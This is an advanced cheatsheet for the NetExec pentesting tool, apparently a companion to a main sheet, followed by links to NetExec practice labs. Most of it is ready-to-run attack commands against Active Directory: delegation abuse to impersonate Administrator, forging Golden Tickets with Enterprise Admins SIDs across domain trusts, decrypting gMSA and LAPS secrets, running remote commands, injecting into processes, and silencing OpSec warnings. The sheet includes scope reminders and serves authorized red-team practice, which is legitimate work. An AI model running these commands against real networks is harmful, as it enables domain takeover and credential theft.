This page picks up where the main NetExec cheatsheet leaves off. It covers techniques that need more context, carry more risk, or are simply used less often — the kind of thing you reach for once you’re comfortable with the basics. Nothing here is repeated from the main sheet.
Operational flags
# Route all output through nxc's SQLite DB into your engagement workspace (see main sheet's Logging & database section)
netexec <protocol> <target> -u <user> -p <password> --log run.log
# Silence the OpSec warnings nxc prints before risky actions (persists via nxc.conf, not a CLI flag)
# ~/.nxc/nxc.conf -> [nxc] ignore_opsec_warnings = True
# Audit mode: dry-run a module/action without actually touching the target
# Configure in nxc.conf under the relevant module/protocol section
Kerberos delegation abuse
Resource-Based Constrained Delegation (RBCD)
If you control an account listed in a target object’s msDS-AllowedToActOnBehalfOfOtherIdentity, nxc can drive the whole S4U exchange and impersonate any user on that object:
netexec smb <target> -u <user> -p <password> --delegate Administrator
RBCD without an SPN (--u2u)
Accounts without an SPN normally can’t complete S4U2Self (KDC_ERR_S_PRINCIPAL_UNKNOWN). The --u2u flag chains user-to-user Kerberos so the ticket is encrypted with your own TGT session key instead of an SPN-derived key. Workflow:
# 1. Get a TGT for the SPN-less account and read its RC4 session key
netexec smb <target> -u <user> -p <password> --generate-tgt <basename>
export KRB5CCNAME=<basename>.ccache
describeTicket.py <basename>.ccache
# 2. Set the account's NT hash to that session key
netexec smb <target> -u <user> -p <password> -M change-password -o NEWNTHASH='<rc4_session_key>'
# 3. Run the delegation chain using the cached ticket
export KRB5CCNAME=<basename>.ccache
netexec smb <target> --use-kcache --delegate Administrator --u2u
This needs RC4 to still be viable in the domain and will reset the account’s usable password/hash — plan for that.
S4U2Self only (no RBCD object required)
Any computer account can nearly always get local admin on itself via S4U2Self:
netexec smb <target> -u 'COMPUTER$' -H <nt_hash> --delegate Administrator --self
Domain trusts abuse
Raisechild — child ↔ parent forest trust
Automates forging a Golden Ticket with an extra SID (e.g. Enterprise Admins) across an intra-forest transitive trust, working in either direction. It dumps the child domain’s krbtgt hash, enumerates the trust, and crafts the ticket for you — supports AES so it still works with RC4 disabled (e.g. Server 2025). The target username must exist in both domains (PAC validation).
Works child → parent and parent → child.
netexec ldap <target> -u <user> -p <password> -M raisechild
Using a specific account:
nxc ldap <target> -u <user> -p <pass> -M raisechild -o USER=test123 USER_ID=1111
Using AES256:
nxc ldap <target> -u <user> -p <pass> -M raisechild -o ETYPE=aes256
Change the injected extra SID:
nxc ldap <target> -u <user> -p <pass> -M raisechild -o RID=512
- Module Options:
| Option | Description | Default |
|---|---|---|
USER | User to impersonate (must exist in both domains) | Administrator |
USER_ID | RID of USER in the current domain | 500 |
RID | Extra SID RID injected from the other domain | 519 (Enterprise Admins) |
ETYPE | rc4 / aes128 / aes256 | rc4 |
The RID must always correspond to the domain whose krbtgt key is used to forge the ticket.
ESC8 (AD CS web enrollment + NTLM relay)
nxc’s adcs module is the recon step; combine with a coercion method (see main sheet’s vulnerability checks) and an NTLM relay tool to actually relay to the CA’s web enrollment endpoint:
netexec ldap <target> -u <user> -p <password> -M adcs # list enrollment servers
netexec ldap <target> -u <user> -p <password> -M adcs -o SERVER=<ca_fqdn> # list templates on a CA
Rights and secrets extraction
# Read effective DACL rights on an AD object (who can write to what)
netexec ldap <target> -u <user> -p <password> -M read_dacl -o TARGET=<object>
# Convert/decrypt gMSA secrets after dumping them with --gmsa
netexec ldap <target> -u <user> -p <password> --gmsa-convert-id <id>
netexec ldap <target> -u <user> -p <password> --gmsa-decrypt-lsa <gmsa_account>
LAPS internals
--laps isn’t just a flag on --sam/--ntds runs — it’s a standalone core option once you hold an account that can read the LAPS attribute, letting you authenticate across a whole domain of rotating local admin passwords without knowing them ahead of time:
netexec smb <target> -u <user> -p <password> --laps
netexec smb <target> -u <user> -p <password> --laps -x whoami
Impersonation & process-level tricks
# Run a command in the context of a specific process ID (requires SYSTEM on the target)
netexec smb <target> -u <user> -p <password> -M pi -o PID=<target_pid> EXEC=<command>
pi injects into an existing process owned by a logged-on user to run commands as that user — useful when schtask_as (see main sheet) isn’t viable because the target has no interactive session, only a running process.
NetExec Lab
You can deploy all labs on your own infrastructure (VMware, VirtualBox, or Ludus).
We recommend Ludus for the best experience, but the choice is entirely yours 🔥
- First Lab: LeHack 2024 - Rome
- Second Lab: Barbhack 2024 - Batman
- Third Lab: LeHack 2025 - Star Wars
- Fourth Lab: Barbhack 2025 - Pirates of the Caribbean
LeHack 2024 - Rome

- Lab created by mpgn
- Lab build by Aleem Ladha
- https://docs.ludus.cloud/docs/environment-guides/netexec-workshop-lehack-2024/
- https://github.com/Pennyw0rth/NetExec-Lab/tree/main/LeHack-2024
Barbhack 2024 - Batman

- Lab created by mpgn
- Lab build by Aleem Ladha
- https://docs.ludus.cloud/docs/environment-guides/barbhack-ctf-2024
- https://github.com/Pennyw0rth/NetExec-Lab/tree/main/BARBHACK-2024
LeHack 2025 - Star Wars

- Lab created by mpgn
- Lab build by Aleem Ladha
- https://docs.ludus.cloud/docs/environment-guides/netexec-workshop-lehack-2025
- https://github.com/Pennyw0rth/NetExec-Lab/tree/main/LeHack-2025
Barbhack 2025 - Pirates of the Caribbean

- Lab created by mpgn
- Lab build by mpgn
- https://github.com/Pennyw0rth/NetExec-Lab/tree/main/Barbhack-2025
Notes
- These techniques assume you already hold valid credentials or a foothold — always confirm scope and rules of engagement before running delegation, trust-abuse, or shell-delivery modules.
- Most of the above change domain state (password/hash resets, scheduled tasks, forged tickets) — clean up afterward and log everything (
--log) for the final report. - Full module list and options: netexec.wiki
